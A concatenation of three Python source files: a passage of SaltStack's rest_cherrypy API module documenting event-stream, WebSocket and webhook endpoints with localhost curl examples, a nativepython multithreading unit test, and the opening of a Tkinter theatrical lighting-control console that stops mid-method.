the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
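# --- Hedged usage sketch (not part of the Salt source): consuming the /events
# SSE stream from Python with the third-party ``requests`` library, using the
# ``?token=`` query parameter shown in the docstring above. The URL is an
# illustrative assumption.
def _example_consume_events(api_session_token):
    import json
    import requests  # assumption: installed in the client environment
    resp = requests.get('http://localhost:8000/events',
                        params={'token': api_session_token}, stream=True)
    tag = None
    for line in resp.iter_lines(decode_unicode=True):
        # Records are blank-line separated; strip the SSE field prefixes.
        if line.startswith('tag: '):
            tag = line[len('tag: '):]
        elif line.startswith('data: '):
            print(tag, json.loads(line[len('data: '):]))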
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The above examples show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
    This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
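# --- Hedged usage sketch (not part of the Salt source): firing a custom event
# through the webhook URL from Python. The URL path, payload, and the use of a
# session token are illustrative assumptions.
def _example_fire_hook(api_session_token):
    import requests  # assumption: installed in the client environment
    resp = requests.post(
        'http://localhost:8000/hook/mycompany/myapp/mydata',
        json={'foo': 'Foo!', 'bar': 'Bar!'},
        headers={'X-Auth-Token': api_session_token})
    resp.raise_for_status()
    # The Reactor would see an event tagged salt/netapi/hook/mycompany/myapp/mydata
    return resp.json()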
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
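# --- Hedged usage sketch (not part of the Salt source): one way the objects
# returned by get_app() might be mounted in a bare CherryPy process. The real
# salt-api daemon performs an equivalent step; ``root_prefix`` below is an
# optional rest_cherrypy setting assumed to default to '/'.
def _example_serve(opts):
    root, apiopts, cpyopts = get_app(opts)
    cherrypy.quickstart(root, apiopts.get('root_prefix', '/'), cpyopts)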
|
multithreading_test.py
|
# Copyright 2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typed_python import *
import typed_python._types as _types
from nativepython.runtime import Runtime
import unittest
import time
import threading
import os
def thread_apply(f, argtuples):
threads = []
results = {}
def doit(f, ix, *args):
results[ix] = f(*args)
for ix, a in enumerate(argtuples):
threads.append(threading.Thread(target=doit, args=(f, ix) + a))
for t in threads:
t.start()
for t in threads:
t.join()
return [results.get(i) for i in range(len(argtuples))]
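# Illustrative note: thread_apply(f, [(1,), (2,)]) runs f(1) and f(2) on
# separate threads concurrently and returns their results in argument order,
# i.e. [f(1), f(2)].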
def Compiled(f):
f = Function(f)
return Runtime.singleton().compile(f)
class AClass(Class):
x = Member(int)
class TestMultithreading(unittest.TestCase):
def test_gil_is_released(self):
@Compiled
def f(x: int):
res = 0.0
for i in range(x):
res += i
return res
ratios = []
for _1 in range(10):
t0 = time.time()
thread_apply(f, [(100000000,)])
t1 = time.time()
thread_apply(f, [(100000000,), (100000001,)])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we may be running in a multitenant environment
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .8 and ratio < 1.75, ratio)
else:
self.assertTrue(ratio >= .9 and ratio < 1.1, ratio)
def test_refcounts_of_objects_across_boundary(self):
class Object:
pass
_ = Object()
A = Alternative("A", X={'x': int}, Y={'y': int})
for instance in [
TupleOf(int)((1, 2, 3)),
ListOf(int)((1, 2, 3)),
# Dict(int,int)({1:2,3:4}),
ConstDict(int, int)({1: 2, 3: 4}),
AClass(),
# anObject,
A.X(x=10)
]:
self.refcountsTest(instance)
def refcountsTest(self, instance):
typeOfInstance = type(instance)
@Compiled
def rapidlyIncAndDecref(x: typeOfInstance):
_ = x
for _1 in range(1000000):
_ = x
return x
thread_apply(rapidlyIncAndDecref, [(instance,)] * 10)
self.assertEqual(_types.refcount(instance), 1)
def test_serialize_is_parallel(self):
x = ListOf(int)()
x.resize(1000000)
sc = SerializationContext({})
def f():
for i in range(10):
sc.deserialize(sc.serialize(x))
ratios = []
for i in range(10):
t0 = time.time()
thread_apply(f, [()])
t1 = time.time()
thread_apply(f, [(), ()])
t2 = time.time()
first = t1 - t0
second = t2 - t1
ratios.append(second/first)
ratios = sorted(ratios)
ratio = ratios[5]
# expect the ratio to be close to 1, but have some error margin, especially on Travis
# where we don't really get two cores
if os.environ.get('TRAVIS_CI', None):
self.assertTrue(ratio >= .8 and ratio < 1.75, ratios)
else:
self.assertTrue(ratio >= .8 and ratio < 1.2, ratios)
|
lxconsole.py
|
#!/usr/bin/python
# lxconsole.py
#
# by Claude Heintz
# copyright 2014-15 by Claude Heintz Design
#
# see license included with this distribution or
# https://www.claudeheintzdesign.com/lx/opensource.html
#################################################################
#
# This file contains the main interface for a simple lighting control application
# The user interface is provided through Tkinter
# if Tkinter is not installed, on linux use: sudo apt-get install python-tk
# refer to READ ME.txt for configuration information
#
#################################################################
try:
from Tkinter import *
import tkFileDialog as tkfile_dialog
import tkMessageBox as tkmsg_box
# python2 imports
except:
from tkinter import *
import tkinter.filedialog as tkfile_dialog
import tkinter.messagebox as tkmsg_box
#python3 imports
from CTProperties import CTProperties
from LXChannelDisplay import LXChannelDisplay
from LXCues import LXCues
from LXCues import LXLiveCue
from LXCuesAsciiParser import LXCuesAsciiParser
from OSCListener import OSCListener
import time
import threading
import os
import sys  # needed for sys.exit() and sys.exc_info() used below
class App:
def __init__(self, master):
self.boss = master
master.title('LXConsole')
master.bind('<Return>', self.read_cmd)
#read application options
self.props = CTProperties()
cpath = os.path.realpath(__file__)
self.pylxdir = os.path.dirname(cpath)
self.props.parseFile( self.pylxdir + "/lxconsole.properties")
chans = self.props.intForKey("channels", 300)
dims = self.props.intForKey("dimmers", 512)
#create cues
self.cues = LXCues(chans, dims)
self.cues.delegate = self
self.update_thread = None
self.updating = False
self.path = ""
self.lastcomplete = None
self.back = None
self.oscin = None
#setup output interface
use_interface = self.props.stringForKey("interface", "")
if use_interface == "widget":
self.set_usb_out()
else:
self.set_artnet_out()
self.oscport = int(self.props.stringForKey("oscport", "7688"))
self.echo_osc_ip = self.props.stringForKey("echo_osc_ip", "none")
self.echo_osc_port = int(self.props.stringForKey("echo_osc_port", "9000"))
#create main tk frame
f = Frame(master, height=500, width=580)
f.pack()
f.pack_propagate(0)
#create left frame
lf = Frame(f)
# create channel display
self.chandisp = LXChannelDisplay(lf,self.cues.channels, 10)
# create command field
self.e = Entry(lf)
self.e.pack(fill=X, side=BOTTOM)
self.e.bind("<Key>", self.key)
lf.pack(side=LEFT)
#create right frame
rf = Frame(f, height=500, width=250)
rf.pack(side=RIGHT)
rf.pack_propagate(0)
# create current cue label
self.cqt = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqt.pack(fill=X, side=TOP)
# create current cue up label
self.cqup = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqup.pack(fill=X, side=TOP)
# create current cue down label
self.cqdn = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqdn.pack(fill=X, side=TOP)
# create current cue follow label
self.cqf = Label(rf, anchor=W, width=20, padx=5, pady=5)
self.cqf.pack(fill=X, side=TOP)
# create go button
cf = Frame(rf)
self.gb = Button(cf, text="Go", width=10, command=self.go_cmd)
self.gb.pack(side=BOTTOM)
self.sb = Button(cf, text="Stop", width=10, command=self.stop_cmd)
self.sb.pack(side=BOTTOM)
self.sb = Button(cf, text="Back", width=10, command=self.back_cmd)
self.sb.pack(side=BOTTOM)
cf.pack(side=LEFT)
# create next cue label and pack the gf frame
self.nx = Label(rf, width=5)
self.nx.pack(side=LEFT)
# create master fader
pf = Frame(rf, width=20)
pf.pack(side=RIGHT)
self.mfader = Scale(rf, from_=100, to=0, showvalue=0)
self.mfader.set(100)
self.mfader.config(command=self.scroll_change)
self.mfader.pack(side=RIGHT)
# create a menu
menubar=Menu(master)
filemenu=Menu(menubar, tearoff=0)
filemenu.add_command(label='Open',command=self.menuOpen)
filemenu.add_command(label='Save',command=self.menuSave)
filemenu.add_command(label='Exit', command=self.menuQuit)
menubar.add_cascade(label='File', menu=filemenu)
self.oscIN = BooleanVar()
livemenu=Menu(menubar, tearoff=0)
livemenu.add_checkbutton(label="OSC", onvalue=True, offvalue=False, variable=self.oscIN, command=self.menuOSC)
livemenu.add_command(label='Set Output to USB', command=self.menu_set_usb_out)
livemenu.add_command(label='Set Output to Art-Net', command=self.menu_set_artnet_out)
menubar.add_cascade(label='Live', menu=livemenu)
helpmenu=Menu(menubar, tearoff=0)
helpmenu.add_command(label='About', command=self.menuAbout)
helpmenu.add_command(label='Quick Help', command=self.menuQuickHelp)
menubar.add_cascade(label='Help', menu=helpmenu)
master.config(menu=menubar)
self.e.focus_set()
#########################################
#
# menu methods handle setting the output interface
#
#########################################
def set_usb_out(self):
if self.cues.livecue.output != None:
self.cues.livecue.output.close()
try:
from DMXUSBPro import DMXUSBProInterface
serial_port = self.props.stringForKey("widget", "")
iface = DMXUSBProInterface(serial_port)
self.cues.livecue.output = iface
iface.startSending()
except:
tkmsg_box.showinfo("Error Connecting", sys.exc_info()[0])
def set_artnet_out(self):
from ArtNet import ArtNetInterface
if self.cues.livecue.output != None:
self.cues.livecue.output.close()
ip = self.props.stringForKey("artip", "10.255.255.255")
iface = ArtNetInterface(ip)
self.cues.livecue.output = iface
iface.startSending()
#########################################
#
# menu methods handle the menu commands
#
#########################################
def menuOpen(self):
filename = tkfile_dialog.askopenfilename(filetypes=[('ASCII files','*.asc')])
if len(filename) > 0:
p = LXCuesAsciiParser(self.cues.channels, self.cues.livecue.patch.addresses, self.cues.livecue.output)
message = p.parseFile(filename)
if p.success:
self.cues = p.cues
self.cues.next = None
self.lastcomplete = None
self.back = None
self.path = filename
tkmsg_box.showinfo(message='Open',detail=message,icon='info',title='Open')
self.boss.title(os.path.basename(self.path))
self.updateCurrent()
def menuSave(self):
if len(self.path) > 0:
filename = tkfile_dialog.asksaveasfilename(defaultextension="asc", initialfile=os.path.basename(self.path), initialdir=os.path.dirname(self.path))
else:
filename = tkfile_dialog.asksaveasfilename(defaultextension="asc")
if len(filename) > 0:
f = open(filename, 'w')
f.write(self.cues.asciiString())
f.close()
def menuQuit(self):
if tkmsg_box.askokcancel("Quit", "Do you really wish to quit?"):
if self.oscin != None:
self.oscin.stopListening()
sys.exit()
def menu_set_usb_out(self):
if tkmsg_box.askokcancel("USB", "Set USB DMX Pro as output interface?"):
self.set_usb_out()
def menu_set_artnet_out(self):
if tkmsg_box.askokcancel("Art-Net", "Set Art-Net as output interface?"):
self.set_artnet_out()
def menuOSC(self):
if self.oscin == None:
self.oscin = OSCListener()
self.oscin.startListening(self.oscport, self.cues)
else:
self.oscin.stopListening()
self.oscin = None
def menuAbout(self):
tkmsg_box.showinfo(message='LXConsole|Python v 0.8',detail='build 4026\nCopyright 2015-2018 Claude Heintz Design\nSee source files for license info.',icon='info',title='About LXConsole')
def menuQuickHelp(self):
f = open(self.pylxdir + '/quickhelp.txt', 'r')
message = f.read()
f.close()
self.displayMessage(message, 'Quick Help')
#########################################
#
# go and stop
#
# go_cmd is initiated by the Go Button
# stop_cmd is called by pressing the esc key
#
#########################################
def go_cmd(self):
self.cues.delegate = self
self.cues.startFadingToCue(self.cues.next)
def stop_cmd(self):
self.cues.livecue.stopped = True
if self.cues.livecue.fading:
self.cues.livecue.followtime = -1
self.cues.livecue.stopFading()
def back_cmd(self):
if self.back != None:
self.cues.delegate = self
self.cues.startFadingToCue(self.back)
#########################################
#
# fade callbacks to the fade delegate are called by the fading thread
#
#########################################
def fadeStarted(self):
self.cqup.config(text="Fading: " + self.cues.livecue.titleString())
self.cqdn.config(text="")
self.cqf.config(text=self.cues.livecue.followTimeString())
self.back = self.lastcomplete
def fadeProgress(self):
self.updateDisplayAsynch()
def fadeComplete(self):
if self.cues.livecue.stopped == False:
self.lastcomplete = self.cues.current
self.updateDisplay()
self.updateCurrent()
#########################################
#
# display updates
# can happen on a separate thread to allow the fade thread
# not to have to wait for the user interface
#
#########################################
def updateAsynch(self):
while (self.updating):
self.updating = False
self.updateDisplay()
time.sleep(0.1) #max update every 10th of a second
self.update_thread = None
def updateDisplayAsynch(self):
        self.updating = True
if self.update_thread is None:
self.update_thread = threading.Thread(target=self.updateAsynch)
self.update_thread.daemon = True
self.update_thread.start()
def updateDisplay(self):
self.cues.updateDisplay(self.chandisp)
root.update_idletasks()
def updateOutput(self):
self.cues.updateDisplay(self.chandisp)
self.cues.livecue.writeToInterface()
def updateCurrent(self):
if self.cues.current != None:
self.cqt.config(text=self.cues.current.titleString())
self.cqup.config(text=self.cues.current.upTimeString())
self.cqdn.config(text=self.cues.current.downTimeString())
self.cqf.config(text=self.cues.current.followTimeString())
else:
self.cqt.config(text="")
self.cqup.config(text="")
self.cqdn.config(text="")
self.cqf.config(text="")
if self.cues.next != None:
self.nx.config(text=str(self.cues.next.number))
else:
self.nx.config(text="")
#########################################
#
# display message opens a window to display some text
#
#########################################
def displayMessage(self, message, title="Message"):
auxmaster = Tk()
auxmaster.title(title)
frame = Frame(auxmaster, height=530, width=530)
frame.pack()
frame.pack_propagate(0)
scrollbar = Scrollbar(frame)
scrollbar.pack(side=RIGHT, fill=Y)
l = Text(frame, yscrollcommand=scrollbar.set)
l.pack(side=LEFT, fill=BOTH)
l.insert(INSERT,message)
scrollbar.config(command=l.yview)
def displayPatch(self):
self.displayMessage(self.cues.livecue.patch.patchString(), "Patch")
def displayCues(self):
self.displayMessage(self.cues.descriptionString(), "Cues")
def displayOSC(self):
self.displayMessage(self.cues.oscString(), "OSC")
def displayDimmerOptions(self):
self.displayMessage(self.cues.livecue.patch.optionString(), "Dimmer Options")
#########################################
#
# The channel display only shows a certain number of channels
# at a time.
#
#########################################
def displayNextPage(self):
self.chandisp.nextPage()
self.updateDisplay()
def displayPrevPage(self):
self.chandisp.prevPage()
self.updateDisplay()
#########################################
#
# This is called by a change in the master fader
#
#########################################
def scroll_change(self, event):
self.cues.setMasterLevel(float(self.mfader.get()))
self.updateOutput()
#########################################
#
# This is called when a key is pressed in the command line
#
#########################################
def key(self, event):
self.external_key(event.char)
return "break"
#########################################
#
# This method takes a key press and interprets it based on context,
# expanding it if it begins or ends a command
# or substituting such as 'a' becoming '@'
#
#########################################
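    # Illustrative examples of the substitutions handled below:
    #   'a' inserts '@'; 'f' completes the line with '@100' (full) and executes;
    #   'x' or 'z' complete with '@0' (out) and execute; return (ord 13) runs
    #   read_cmd; and ']' / '[' page the channel display forward / back.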
def external_key(self, k):
if len(k) == 0:
return
if k == "enter":
self.read_cmd(None)
elif ord(k) == 13:
self.read_cmd(None)
elif ord(k) == 127:
self.e.delete(len(self.e.get())-1,END)
elif ord(k) == 8:
self.e.delete(len(self.e.get())-1,END)
elif k == "clear":
self.e.delete(0, END)
elif k == "-":
